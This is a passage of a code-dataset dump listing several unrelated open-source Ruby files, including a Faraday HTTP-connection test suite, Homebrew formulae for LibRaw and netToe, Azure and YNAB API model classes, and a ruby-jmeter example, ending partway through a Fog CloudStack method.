hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
267eaace3df2ec80274b48db7d52280879eb37a5 | 619 | require 'xcpretty/term'
module XCPretty
describe Term do
it "marks unicode as unavailable" do
Encoding.stub(:default_external).and_return(Encoding::ASCII)
Term.unicode?.should be false
end
it "marks unicode as available" do
Encoding.stub(:default_external).and_return(Encoding::UTF_8)
Term.unicode?.should be true
end
it 'marks color as unavailable' do
STDOUT.stub(:tty?).and_return(false)
Term.color?.should be false
end
it 'marks color as available' do
STDOUT.stub(:tty?).and_return(true)
Term.color?.should be true
end
end
end
| 22.925926 | 66 | 0.678514 |
014044329a20df7ba91f3f11076bba2e51ad0812 | 46 | require 'action_dispatch'
require 'rack/test'
| 15.333333 | 25 | 0.804348 |
acbe8a45cc68e9793c847ccb860e149a84cd82b6 | 22,836 | # frozen_string_literal: true
shared_examples 'initializer with url' do
context 'with simple url' do
let(:address) { 'http://sushi.com' }
it { expect(subject.host).to eq('sushi.com') }
it { expect(subject.port).to eq(80) }
it { expect(subject.scheme).to eq('http') }
it { expect(subject.path_prefix).to eq('/') }
it { expect(subject.params).to eq({}) }
end
context 'with complex url' do
let(:address) { 'http://sushi.com:815/fish?a=1' }
it { expect(subject.port).to eq(815) }
it { expect(subject.path_prefix).to eq('/fish') }
it { expect(subject.params).to eq('a' => '1') }
end
context 'with IPv6 address' do
let(:address) { 'http://[::1]:85/' }
it { expect(subject.host).to eq('[::1]') }
it { expect(subject.port).to eq(85) }
end
end
shared_examples 'default connection options' do
after { Faraday.default_connection_options = nil }
it 'works with implicit url' do
conn = Faraday.new 'http://sushi.com/foo'
expect(conn.options.timeout).to eq(10)
end
it 'works with option url' do
conn = Faraday.new url: 'http://sushi.com/foo'
expect(conn.options.timeout).to eq(10)
end
it 'works with instance connection options' do
conn = Faraday.new 'http://sushi.com/foo', request: { open_timeout: 1 }
expect(conn.options.timeout).to eq(10)
expect(conn.options.open_timeout).to eq(1)
end
it 'default connection options persist with an instance overriding' do
conn = Faraday.new 'http://nigiri.com/bar'
conn.options.timeout = 1
expect(Faraday.default_connection_options.request.timeout).to eq(10)
other = Faraday.new url: 'https://sushi.com/foo'
other.options.timeout = 1
expect(Faraday.default_connection_options.request.timeout).to eq(10)
end
it 'default connection uses default connection options' do
expect(Faraday.default_connection.options.timeout).to eq(10)
end
end
RSpec.describe Faraday::Connection do
let(:conn) { Faraday::Connection.new(url, options) }
let(:url) { nil }
let(:options) { nil }
describe '.new' do
subject { conn }
context 'with implicit url param' do
# Faraday::Connection.new('http://sushi.com')
let(:url) { address }
it_behaves_like 'initializer with url'
end
context 'with explicit url param' do
# Faraday::Connection.new(url: 'http://sushi.com')
let(:url) { { url: address } }
it_behaves_like 'initializer with url'
end
context 'with custom builder' do
let(:custom_builder) { Faraday::RackBuilder.new }
let(:options) { { builder: custom_builder } }
it { expect(subject.builder).to eq(custom_builder) }
end
context 'with custom params' do
let(:options) { { params: { a: 1 } } }
it { expect(subject.params).to eq('a' => 1) }
end
context 'with custom params and params in url' do
let(:url) { 'http://sushi.com/fish?a=1&b=2' }
let(:options) { { params: { a: 3 } } }
it { expect(subject.params).to eq('a' => 3, 'b' => '2') }
end
context 'with custom headers' do
let(:options) { { headers: { user_agent: 'Faraday' } } }
it { expect(subject.headers['User-agent']).to eq('Faraday') }
end
context 'with ssl false' do
let(:options) { { ssl: { verify: false } } }
it { expect(subject.ssl.verify?).to be_falsey }
end
context 'with empty block' do
let(:conn) { Faraday::Connection.new {} }
it { expect(conn.builder.handlers.size).to eq(0) }
end
context 'with block' do
let(:conn) do
Faraday::Connection.new(params: { 'a' => '1' }) do |faraday|
faraday.adapter :net_http
faraday.url_prefix = 'http://sushi.com/omnom'
end
end
it { expect(conn.builder.handlers.size).to eq(0) }
it { expect(conn.path_prefix).to eq('/omnom') }
end
end
describe '#close' do
it 'can close underlying app' do
expect(conn.app).to receive(:close)
conn.close
end
end
describe 'basic_auth' do
subject { conn }
context 'calling the #basic_auth method' do
before { subject.basic_auth 'Aladdin', 'open sesame' }
it { expect(subject.headers['Authorization']).to eq('Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==') }
end
context 'adding basic auth info to url' do
let(:url) { 'http://Aladdin:open%[email protected]/fish' }
it { expect(subject.headers['Authorization']).to eq('Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==') }
end
end
describe '#token_auth' do
before { subject.token_auth('abcdef', nonce: 'abc') }
it { expect(subject.headers['Authorization']).to eq('Token nonce="abc", token="abcdef"') }
end
describe '#build_exclusive_url' do
context 'with relative path' do
subject { conn.build_exclusive_url('sake.html') }
it 'uses connection host as default host' do
conn.host = 'sushi.com'
expect(subject.host).to eq('sushi.com')
expect(subject.scheme).to eq('http')
end
it do
conn.path_prefix = '/fish'
expect(subject.path).to eq('/fish/sake.html')
end
it do
conn.path_prefix = '/'
expect(subject.path).to eq('/sake.html')
end
it do
conn.path_prefix = 'fish'
expect(subject.path).to eq('/fish/sake.html')
end
it do
conn.path_prefix = '/fish/'
expect(subject.path).to eq('/fish/sake.html')
end
end
context 'with absolute path' do
subject { conn.build_exclusive_url('/sake.html') }
after { expect(subject.path).to eq('/sake.html') }
it { conn.path_prefix = '/fish' }
it { conn.path_prefix = '/' }
it { conn.path_prefix = 'fish' }
it { conn.path_prefix = '/fish/' }
end
context 'with complete url' do
subject { conn.build_exclusive_url('http://sushi.com/sake.html?a=1') }
it { expect(subject.scheme).to eq('http') }
it { expect(subject.host).to eq('sushi.com') }
it { expect(subject.port).to eq(80) }
it { expect(subject.path).to eq('/sake.html') }
it { expect(subject.query).to eq('a=1') }
end
it 'overrides connection port for absolute url' do
conn.port = 23
uri = conn.build_exclusive_url('http://sushi.com')
expect(uri.port).to eq(80)
end
it 'does not add ending slash given nil url' do
conn.url_prefix = 'http://sushi.com/nigiri'
uri = conn.build_exclusive_url
expect(uri.path).to eq('/nigiri')
end
it 'does not add ending slash given empty url' do
conn.url_prefix = 'http://sushi.com/nigiri'
uri = conn.build_exclusive_url('')
expect(uri.path).to eq('/nigiri')
end
it 'does not use connection params' do
conn.url_prefix = 'http://sushi.com/nigiri'
conn.params = { a: 1 }
expect(conn.build_exclusive_url.to_s).to eq('http://sushi.com/nigiri')
end
it 'allows to provide params argument' do
conn.url_prefix = 'http://sushi.com/nigiri'
conn.params = { a: 1 }
params = Faraday::Utils::ParamsHash.new
params[:a] = 2
uri = conn.build_exclusive_url(nil, params)
expect(uri.to_s).to eq('http://sushi.com/nigiri?a=2')
end
it 'handles uri instances' do
uri = conn.build_exclusive_url(URI('/sake.html'))
expect(uri.path).to eq('/sake.html')
end
context 'with url_prefixed connection' do
let(:url) { 'http://sushi.com/sushi/' }
it 'parses url and changes scheme' do
conn.scheme = 'https'
uri = conn.build_exclusive_url('sake.html')
expect(uri.to_s).to eq('https://sushi.com/sushi/sake.html')
end
it 'joins url to base with ending slash' do
uri = conn.build_exclusive_url('sake.html')
expect(uri.to_s).to eq('http://sushi.com/sushi/sake.html')
end
it 'used default base with ending slash' do
uri = conn.build_exclusive_url
expect(uri.to_s).to eq('http://sushi.com/sushi/')
end
it 'overrides base' do
uri = conn.build_exclusive_url('/sake/')
expect(uri.to_s).to eq('http://sushi.com/sake/')
end
end
context 'with colon in path' do
let(:url) { 'http://service.com' }
it 'joins url to base when used absolute path' do
conn = Faraday.new(url: url)
uri = conn.build_exclusive_url('/service:search?limit=400')
expect(uri.to_s).to eq('http://service.com/service:search?limit=400')
end
it 'joins url to base when used relative path' do
conn = Faraday.new(url: url)
uri = conn.build_exclusive_url('service:search?limit=400')
expect(uri.to_s).to eq('http://service.com/service%3Asearch?limit=400')
end
it 'joins url to base when used with path prefix' do
conn = Faraday.new(url: url)
conn.path_prefix = '/api'
uri = conn.build_exclusive_url('service:search?limit=400')
expect(uri.to_s).to eq('http://service.com/api/service%3Asearch?limit=400')
end
end
end
describe '#build_url' do
let(:url) { 'http://sushi.com/nigiri' }
it 'uses params' do
conn.params = { a: 1, b: 1 }
expect(conn.build_url.to_s).to eq('http://sushi.com/nigiri?a=1&b=1')
end
it 'merges params' do
conn.params = { a: 1, b: 1 }
url = conn.build_url(nil, b: 2, c: 3)
expect(url.to_s).to eq('http://sushi.com/nigiri?a=1&b=2&c=3')
end
end
describe '#build_request' do
let(:url) { 'https://asushi.com/sake.html' }
let(:request) { conn.build_request(:get) }
before do
conn.headers = { 'Authorization' => 'token abc123' }
request.headers.delete('Authorization')
end
it { expect(conn.headers.keys).to eq(['Authorization']) }
it { expect(conn.headers.include?('Authorization')).to be_truthy }
it { expect(request.headers.keys).to be_empty }
it { expect(request.headers.include?('Authorization')).to be_falsey }
end
describe '#to_env' do
subject { conn.build_request(:get).to_env(conn).url }
let(:url) { 'http://sushi.com/sake.html' }
let(:options) { { params: @params } }
it 'parses url params into query' do
@params = { 'a[b]' => '1 + 2' }
expect(subject.query).to eq('a%5Bb%5D=1+%2B+2')
end
it 'escapes per spec' do
@params = { 'a' => '1+2 foo~bar.-baz' }
expect(subject.query).to eq('a=1%2B2+foo~bar.-baz')
end
it 'bracketizes nested params in query' do
@params = { 'a' => { 'b' => 'c' } }
expect(subject.query).to eq('a%5Bb%5D=c')
end
it 'bracketizes repeated params in query' do
@params = { 'a' => [1, 2] }
expect(subject.query).to eq('a%5B%5D=1&a%5B%5D=2')
end
it 'without braketizing repeated params in query' do
@params = { 'a' => [1, 2] }
conn.options.params_encoder = Faraday::FlatParamsEncoder
expect(subject.query).to eq('a=1&a=2')
end
end
describe 'proxy support' do
it 'accepts string' do
with_env 'http_proxy' => 'http://env-proxy.com:80' do
conn.proxy = 'http://proxy.com'
expect(conn.proxy.host).to eq('proxy.com')
end
end
it 'accepts uri' do
with_env 'http_proxy' => 'http://env-proxy.com:80' do
conn.proxy = URI.parse('http://proxy.com')
expect(conn.proxy.host).to eq('proxy.com')
end
end
it 'accepts hash with string uri' do
with_env 'http_proxy' => 'http://env-proxy.com:80' do
conn.proxy = { uri: 'http://proxy.com', user: 'rick' }
expect(conn.proxy.host).to eq('proxy.com')
expect(conn.proxy.user).to eq('rick')
end
end
it 'accepts hash' do
with_env 'http_proxy' => 'http://env-proxy.com:80' do
conn.proxy = { uri: URI.parse('http://proxy.com'), user: 'rick' }
expect(conn.proxy.host).to eq('proxy.com')
expect(conn.proxy.user).to eq('rick')
end
end
it 'accepts http env' do
with_env 'http_proxy' => 'http://env-proxy.com:80' do
expect(conn.proxy.host).to eq('env-proxy.com')
end
end
it 'accepts http env with auth' do
with_env 'http_proxy' => 'http://a%40b:my%[email protected]:80' do
expect(conn.proxy.user).to eq('a@b')
expect(conn.proxy.password).to eq('my pass')
end
end
it 'accepts env without scheme' do
with_env 'http_proxy' => 'localhost:8888' do
uri = conn.proxy[:uri]
expect(uri.host).to eq('localhost')
expect(uri.port).to eq(8888)
end
end
it 'fetches no proxy from nil env' do
with_env 'http_proxy' => nil do
expect(conn.proxy).to be_nil
end
end
it 'fetches no proxy from blank env' do
with_env 'http_proxy' => '' do
expect(conn.proxy).to be_nil
end
end
it 'does not accept uppercase env' do
with_env 'HTTP_PROXY' => 'http://localhost:8888/' do
expect(conn.proxy).to be_nil
end
end
it 'allows when url in no proxy list' do
with_env 'http_proxy' => 'http://proxy.com', 'no_proxy' => 'example.com' do
conn = Faraday::Connection.new('http://example.com')
expect(conn.proxy).to be_nil
end
end
it 'allows when url in no proxy list with url_prefix' do
with_env 'http_proxy' => 'http://proxy.com', 'no_proxy' => 'example.com' do
conn = Faraday::Connection.new
conn.url_prefix = 'http://example.com'
expect(conn.proxy).to be_nil
end
end
it 'allows when prefixed url is not in no proxy list' do
with_env 'http_proxy' => 'http://proxy.com', 'no_proxy' => 'example.com' do
conn = Faraday::Connection.new('http://prefixedexample.com')
expect(conn.proxy.host).to eq('proxy.com')
end
end
it 'allows when subdomain url is in no proxy list' do
with_env 'http_proxy' => 'http://proxy.com', 'no_proxy' => 'example.com' do
conn = Faraday::Connection.new('http://subdomain.example.com')
expect(conn.proxy).to be_nil
end
end
it 'allows when url not in no proxy list' do
with_env 'http_proxy' => 'http://proxy.com', 'no_proxy' => 'example2.com' do
conn = Faraday::Connection.new('http://example.com')
expect(conn.proxy.host).to eq('proxy.com')
end
end
it 'allows when ip address is not in no proxy list but url is' do
with_env 'http_proxy' => 'http://proxy.com', 'no_proxy' => 'localhost' do
conn = Faraday::Connection.new('http://127.0.0.1')
expect(conn.proxy).to be_nil
end
end
it 'allows when url is not in no proxy list but ip address is' do
with_env 'http_proxy' => 'http://proxy.com', 'no_proxy' => '127.0.0.1' do
conn = Faraday::Connection.new('http://localhost')
expect(conn.proxy).to be_nil
end
end
it 'allows in multi element no proxy list' do
with_env 'http_proxy' => 'http://proxy.com', 'no_proxy' => 'example0.com,example.com,example1.com' do
expect(Faraday::Connection.new('http://example0.com').proxy).to be_nil
expect(Faraday::Connection.new('http://example.com').proxy).to be_nil
expect(Faraday::Connection.new('http://example1.com').proxy).to be_nil
expect(Faraday::Connection.new('http://example2.com').proxy.host).to eq('proxy.com')
end
end
it 'test proxy requires uri' do
expect { conn.proxy = { uri: :bad_uri, user: 'rick' } }.to raise_error(ArgumentError)
end
it 'uses env http_proxy' do
with_env 'http_proxy' => 'http://proxy.com' do
conn = Faraday.new
expect(conn.instance_variable_get('@manual_proxy')).to be_falsey
expect(conn.proxy_for_request('http://google.co.uk').host).to eq('proxy.com')
end
end
it 'uses processes no_proxy before http_proxy' do
with_env 'http_proxy' => 'http://proxy.com', 'no_proxy' => 'google.co.uk' do
conn = Faraday.new
expect(conn.instance_variable_get('@manual_proxy')).to be_falsey
expect(conn.proxy_for_request('http://google.co.uk')).to be_nil
end
end
it 'uses env https_proxy' do
with_env 'https_proxy' => 'https://proxy.com' do
conn = Faraday.new
expect(conn.instance_variable_get('@manual_proxy')).to be_falsey
expect(conn.proxy_for_request('https://google.co.uk').host).to eq('proxy.com')
end
end
it 'uses processes no_proxy before https_proxy' do
with_env 'https_proxy' => 'https://proxy.com', 'no_proxy' => 'google.co.uk' do
conn = Faraday.new
expect(conn.instance_variable_get('@manual_proxy')).to be_falsey
expect(conn.proxy_for_request('https://google.co.uk')).to be_nil
end
end
it 'gives priority to manually set proxy' do
with_env 'https_proxy' => 'https://proxy.com', 'no_proxy' => 'google.co.uk' do
conn = Faraday.new
conn.proxy = 'http://proxy2.com'
expect(conn.instance_variable_get('@manual_proxy')).to be_truthy
expect(conn.proxy_for_request('https://google.co.uk').host).to eq('proxy2.com')
end
end
it 'ignores env proxy if set that way' do
with_env_proxy_disabled do
with_env 'http_proxy' => 'http://duncan.proxy.com:80' do
expect(conn.proxy).to be_nil
end
end
end
context 'performing a request' do
before { stub_request(:get, 'http://example.com') }
it 'dynamically checks proxy' do
with_env 'http_proxy' => 'http://proxy.com:80' do
conn = Faraday.new
expect(conn.proxy.uri.host).to eq('proxy.com')
conn.get('http://example.com') do |req|
expect(req.options.proxy.uri.host).to eq('proxy.com')
end
end
conn.get('http://example.com')
expect(conn.instance_variable_get('@temp_proxy')).to be_nil
end
it 'dynamically check no proxy' do
with_env 'http_proxy' => 'http://proxy.com', 'no_proxy' => 'example.com' do
conn = Faraday.new
expect(conn.proxy.uri.host).to eq('proxy.com')
conn.get('http://example.com') do |req|
expect(req.options.proxy).to be_nil
end
end
end
end
end
describe '#dup' do
subject { conn.dup }
let(:url) { 'http://sushi.com/foo' }
let(:options) do
{
ssl: { verify: :none },
headers: { 'content-type' => 'text/plain' },
params: { 'a' => '1' },
request: { timeout: 5 }
}
end
it { expect(subject.build_exclusive_url).to eq(conn.build_exclusive_url) }
it { expect(subject.headers['content-type']).to eq('text/plain') }
it { expect(subject.params['a']).to eq('1') }
context 'after manual changes' do
before do
subject.basic_auth('', '')
subject.headers['content-length'] = 12
subject.params['b'] = '2'
subject.options[:open_timeout] = 10
end
it { expect(subject.builder.handlers.size).to eq(1) }
it { expect(conn.builder.handlers.size).to eq(1) }
it { expect(conn.headers.key?('content-length')).to be_falsey }
it { expect(conn.params.key?('b')).to be_falsey }
it { expect(subject.options[:timeout]).to eq(5) }
it { expect(conn.options[:open_timeout]).to be_nil }
end
end
describe '#respond_to?' do
it { expect(Faraday.respond_to?(:get)).to be_truthy }
it { expect(Faraday.respond_to?(:post)).to be_truthy }
end
describe 'default_connection_options' do
context 'assigning a default value' do
before do
Faraday.default_connection_options = nil
Faraday.default_connection_options.request.timeout = 10
end
it_behaves_like 'default connection options'
end
context 'assigning a hash' do
before { Faraday.default_connection_options = { request: { timeout: 10 } } }
it_behaves_like 'default connection options'
end
end
describe 'request params' do
context 'with simple url' do
let(:url) { 'http://example.com' }
let!(:stubbed) { stub_request(:get, 'http://example.com?a=a&p=3') }
after { expect(stubbed).to have_been_made.once }
it 'test_overrides_request_params' do
conn.get('?p=2&a=a', p: 3)
end
it 'test_overrides_request_params_block' do
conn.get('?p=1&a=a', p: 2) do |req|
req.params[:p] = 3
end
end
it 'test_overrides_request_params_block_url' do
conn.get(nil, p: 2) do |req|
req.url('?p=1&a=a', 'p' => 3)
end
end
end
context 'with url and extra params' do
let(:url) { 'http://example.com?a=1&b=2' }
let(:options) { { params: { c: 3 } } }
it 'merges connection and request params' do
stubbed = stub_request(:get, 'http://example.com?a=1&b=2&c=3&limit=5&page=1')
conn.get('?page=1', limit: 5)
expect(stubbed).to have_been_made.once
end
it 'allows to override all params' do
stubbed = stub_request(:get, 'http://example.com?b=b')
conn.get('?p=1&a=a', p: 2) do |req|
expect(req.params[:a]).to eq('a')
expect(req.params['c']).to eq(3)
expect(req.params['p']).to eq(2)
req.params = { b: 'b' }
expect(req.params['b']).to eq('b')
end
expect(stubbed).to have_been_made.once
end
it 'allows to set params_encoder for single request' do
encoder = Object.new
def encoder.encode(params)
params.map { |k, v| "#{k.upcase}-#{v.to_s.upcase}" }.join(',')
end
stubbed = stub_request(:get, 'http://example.com/?A-1,B-2,C-3,FEELING-BLUE')
conn.get('/', feeling: 'blue') do |req|
req.options.params_encoder = encoder
end
expect(stubbed).to have_been_made.once
end
end
context 'with default params encoder' do
let!(:stubbed) { stub_request(:get, 'http://example.com?color%5B%5D=red&color%5B%5D=blue') }
after { expect(stubbed).to have_been_made.once }
it 'supports array params in url' do
conn.get('http://example.com?color[]=red&color[]=blue')
end
it 'supports array params in params' do
conn.get('http://example.com', color: %w[red blue])
end
end
context 'with flat params encoder' do
let(:options) { { request: { params_encoder: Faraday::FlatParamsEncoder } } }
let!(:stubbed) { stub_request(:get, 'http://example.com?color=blue') }
after { expect(stubbed).to have_been_made.once }
it 'supports array params in params' do
conn.get('http://example.com', color: %w[red blue])
end
context 'with array param in url' do
let(:url) { 'http://example.com?color[]=red&color[]=blue' }
it do
conn.get('/')
end
end
end
end
end
| 31.282192 | 107 | 0.606148 |
7aca756a7c4d22673b96a9fee343c7aa767c1a2a | 264 | FactoryGirl.define do
factory :search, class: KatSearch::Search do
search 'suits s05e16'
initialize_with { new(search) }
end
factory :search_failed, class: KatSearch::Search do
search 'suits s05e72'
initialize_with { new(search) }
end
end
| 22 | 53 | 0.708333 |
38f526d91a4b0d89a0614d948f919145206cb3e9 | 2,755 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::Network::Mgmt::V2020_06_01
module Models
#
# Network Intent Policy resource.
#
class NetworkIntentPolicy < Resource
include MsRestAzure
# @return [String] A unique read-only string that changes whenever the
# resource is updated.
attr_accessor :etag
#
# Mapper for NetworkIntentPolicy class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'NetworkIntentPolicy',
type: {
name: 'Composite',
class_name: 'NetworkIntentPolicy',
model_properties: {
id: {
client_side_validation: true,
required: false,
serialized_name: 'id',
type: {
name: 'String'
}
},
name: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'name',
type: {
name: 'String'
}
},
type: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'type',
type: {
name: 'String'
}
},
location: {
client_side_validation: true,
required: false,
serialized_name: 'location',
type: {
name: 'String'
}
},
tags: {
client_side_validation: true,
required: false,
serialized_name: 'tags',
type: {
name: 'Dictionary',
value: {
client_side_validation: true,
required: false,
serialized_name: 'StringElementType',
type: {
name: 'String'
}
}
}
},
etag: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'etag',
type: {
name: 'String'
}
}
}
}
}
end
end
end
end
| 27.828283 | 76 | 0.427223 |
1d9cc707aafd4ca0675bd4d004171fb15aed33a5 | 1,330 | class Libraw < Formula
desc "Library for reading RAW files from digital photo cameras"
homepage "https://www.libraw.org/"
url "https://www.libraw.org/data/LibRaw-0.19.0.tar.gz"
sha256 "e83f51e83b19f9ba6b8bd144475fc12edf2d7b3b930d8d280bdebd8a8f3ed259"
bottle do
cellar :any
sha256 "3304c2735f53a0967fd6ca446365d12e455119fe331b36af666b6b64bbcafa08" => :high_sierra
sha256 "b8fd178ff8f28172a77b109daa7b8e71f564291fe9725f0e096988ec258f742f" => :sierra
sha256 "aa91b68a3f4aa66cca36c0348e2167339319ee1628ab0369031473b4a4cfe043" => :el_capitan
end
depends_on "pkg-config" => :build
depends_on "jasper"
depends_on "jpeg"
depends_on "little-cms2"
resource "librawtestfile" do
url "https://www.rawsamples.ch/raws/nikon/d1/RAW_NIKON_D1.NEF",
:using => :nounzip
sha256 "7886d8b0e1257897faa7404b98fe1086ee2d95606531b6285aed83a0939b768f"
end
def install
system "./configure", "--prefix=#{prefix}",
"--disable-dependency-tracking"
system "make"
system "make", "install"
doc.install Dir["doc/*"]
prefix.install "samples"
end
test do
resource("librawtestfile").stage do
filename = "RAW_NIKON_D1.NEF"
system "#{bin}/raw-identify", "-u", filename
system "#{bin}/simple_dcraw", "-v", "-T", filename
end
end
end
| 31.666667 | 93 | 0.712782 |
ed60164d214402859269f7bf195f8996c97f7744 | 282 | cask 'hashbackup' do
version '2125'
sha256 '462a6f5c1d0194712ea2c6ebba0480fdbe17aafaf3735f009595e0bdf98daf6c'
url "http://www.hashbackup.com/download/hb-#{version}-mac-64bit.tar.gz"
name 'hashbackup'
homepage 'http://www.hashbackup.com/'
binary "hb-#{version}/hb"
end
| 25.636364 | 75 | 0.751773 |
6a605d3ce17e0b2f5e0bad730606c6f2bb989ad1 | 1,167 | require "bundler/setup"
require "pressy"
RSpec.configure do |config|
# Enable flags like --only-failures and --next-failure
config.example_status_persistence_file_path = ".rspec_status"
# Disable RSpec exposing methods globally on `Module` and `main`
config.disable_monkey_patching!
config.expect_with :rspec do |c|
c.syntax = :expect
end
end
RSpec.shared_examples "command" do |name|
let(:stderr) { StringIO.new }
let(:console) { instance_double("Pressy::Console", error: stderr) }
let(:env) { {} }
let(:site) { instance_double("Pressy::Site") }
let(:registry) { Pressy::Command::Registry.new }
let(:runner) { Pressy::Command::Runner.new(registry, site, console, env) }
before do
registry.register(described_class)
end
it "has command name '#{name}'" do
expect(described_class.name).to be name
end
it "is registered in the default command registry" do
registry = Pressy::Command::Registry.default
expect(registry.lookup(name)).to be described_class
end
it "parses an empty list of arguments" do
args = []
expect(described_class.parse!(args)).to eq({})
expect(args).to be_empty
end
end
| 26.522727 | 76 | 0.703513 |
9187a71d1fa6090ff66040507d12540ee510b70d | 1,333 | class Nettoe < Formula
desc "Tic Tac Toe-like game for the console"
homepage "https://nettoe.sourceforge.io/"
url "https://downloads.sourceforge.net/project/nettoe/nettoe/1.5.1/nettoe-1.5.1.tar.gz"
sha256 "dbc2c08e7e0f7e60236954ee19a165a350ab3e0bcbbe085ecd687f39253881cb"
license "GPL-2.0"
livecheck do
url :stable
end
bottle do
sha256 cellar: :any_skip_relocation, catalina: "59cab1291f69cb1c35a269d18343a3d07eaf55d6f0d178c9548afb282497fc50"
sha256 cellar: :any_skip_relocation, mojave: "2d45bfae915cfc4425e45393a9868c4e586379c05e61f35aaf704cc54376c17c"
sha256 cellar: :any_skip_relocation, high_sierra: "0349c1335e428d5f0b620043259908b5af60feed84d9dea911033e0d65704488"
sha256 cellar: :any_skip_relocation, sierra: "49ad705043bdd9f1ab860d877d3ffba584bef5ddbd4c03f6fe43adc49b9c1e5d"
sha256 cellar: :any_skip_relocation, el_capitan: "c8208683e4730233147e6c7153a469cdc1f477aacde0559937f0da93c8ad0345"
sha256 cellar: :any_skip_relocation, yosemite: "78038d253cd382f5f3a6b3b12c7776828c44c1572f0569bec862763aa5141c2a"
end
def install
system "./configure", "--disable-dependency-tracking",
"--prefix=#{prefix}"
system "make", "install"
end
test do
assert_match(/netToe #{version} /, shell_output("#{bin}/nettoe -v"))
end
end
| 43 | 120 | 0.770443 |
397b758fafc6bcbe8eb58c83547b0eb625c57c9d | 448 | $LOAD_PATH.unshift(File.join(File.dirname(__FILE__), '..', 'lib'))
require 'ruby-jmeter'
test do
threads count: 10 do
visit name: 'Home Page', url: 'https://flooded.io'
end
end.rsync(
remote_host: 'xxx.xxx.xxx.xxx',
remote_user: 'user',
remote_path: '/path/to/remote',
rsync_bin_path: '/usr/bin/rsync',
rsync_params: '-az -e "ssh -i /path/to/key.pem"',
file: './jmx/' + File.basename(__FILE__, ".rb") + '.jmx',
debug: true
)
| 26.352941 | 66 | 0.642857 |
388f6430b190f2dc6b037220d2ad2a78dd722147 | 5,573 | =begin
#YNAB API Endpoints
#Our API uses a REST based design, leverages the JSON data format, and relies upon HTTPS for transport. We respond with meaningful HTTP response codes and if an error occurs, we include error details in the response body. API Documentation is at https://api.youneedabudget.com
OpenAPI spec version: 1.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
Swagger Codegen version: 2.4.19
=end
require 'date'
module YNAB
class BudgetSettingsResponseData
attr_accessor :settings
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
:'settings' => :'settings'
}
end
# Attribute type mapping.
def self.swagger_types
{
:'settings' => :'BudgetSettings'
}
end
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
def initialize(attributes = {})
return unless attributes.is_a?(Hash)
# convert string to symbol for hash key
attributes = attributes.each_with_object({}) { |(k, v), h| h[k.to_sym] = v }
if attributes.has_key?(:'settings')
self.settings = attributes[:'settings']
end
end
# Show invalid properties with the reasons. Usually used together with valid?
# @return Array for valid properties with the reasons
def list_invalid_properties
invalid_properties = Array.new
if @settings.nil?
invalid_properties.push('invalid value for "settings", settings cannot be nil.')
end
invalid_properties
end
# Check to see if the all the properties in the model are valid
# @return true if the model is valid
def valid?
return false if @settings.nil?
true
end
# Checks equality by comparing each attribute.
# @param [Object] Object to be compared
def ==(o)
return true if self.equal?(o)
self.class == o.class &&
settings == o.settings
end
# @see the `==` method
# @param [Object] Object to be compared
def eql?(o)
self == o
end
# Calculates hash code according to all attributes.
# @return [Fixnum] Hash code
def hash
[settings].hash
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
return nil unless attributes.is_a?(Hash)
self.class.swagger_types.each_pair do |key, type|
if type =~ /\AArray<(.*)>/i
# check to ensure the input is an array given that the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
self.send("#{key}=", attributes[self.class.attribute_map[key]].map { |v| _deserialize($1, v) })
end
elsif !attributes[self.class.attribute_map[key]].nil?
self.send("#{key}=", _deserialize(type, attributes[self.class.attribute_map[key]]))
end # or else data not found in attributes(hash), not an issue as the data can be optional
end
self
end
# Deserializes the data based on type
# @param string type Data type
# @param string value Value to be deserialized
# @return [Object] Deserialized data
def _deserialize(type, value)
case type.to_sym
when :DateTime
DateTime.parse(value)
when :Date
Date.parse(value)
when :String
value.to_s
when :Integer
value.to_i
when :Float
value.to_f
when :BOOLEAN
if value.to_s =~ /\A(true|t|yes|y|1)\z/i
true
else
false
end
when :Object
# generic object (usually a Hash), return directly
value
when /\AArray<(?<inner_type>.+)>\z/
inner_type = Regexp.last_match[:inner_type]
value.map { |v| _deserialize(inner_type, v) }
when /\AHash<(?<k_type>.+?), (?<v_type>.+)>\z/
k_type = Regexp.last_match[:k_type]
v_type = Regexp.last_match[:v_type]
{}.tap do |hash|
value.each do |k, v|
hash[_deserialize(k_type, k)] = _deserialize(v_type, v)
end
end
else # model
temp_model = YNAB.const_get(type).new
temp_model.build_from_hash(value)
end
end
# Returns the string representation of the object
# @return [String] String presentation of the object
def to_s
to_hash.to_s
end
# to_body is an alias to to_hash (backward compatibility)
# @return [Hash] Returns the object in the form of hash
def to_body
to_hash
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = self.send(attr)
next if value.nil?
hash[param] = _to_hash(value)
end
hash
end
# Outputs non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
# @param [Object] value Any valid value
# @return [Hash] Returns the value in the form of hash
def _to_hash(value)
if value.is_a?(Array)
value.compact.map { |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
end
end
end
| 29.331579 | 277 | 0.625695 |
91756df754bd4c55d61412f67a680914f8a43272 | 657 | module Fog
module Cloudstack
class Compute
class Real
# Create a virtual router element.
#
# {CloudStack API Reference}[http://cloudstack.apache.org/docs/api/apidocs-4.4/root_admin/createVirtualRouterElement.html]
def create_virtual_router_element(*args)
options = {}
if args[0].is_a? Hash
options = args[0]
options.merge!('command' => 'createVirtualRouterElement')
else
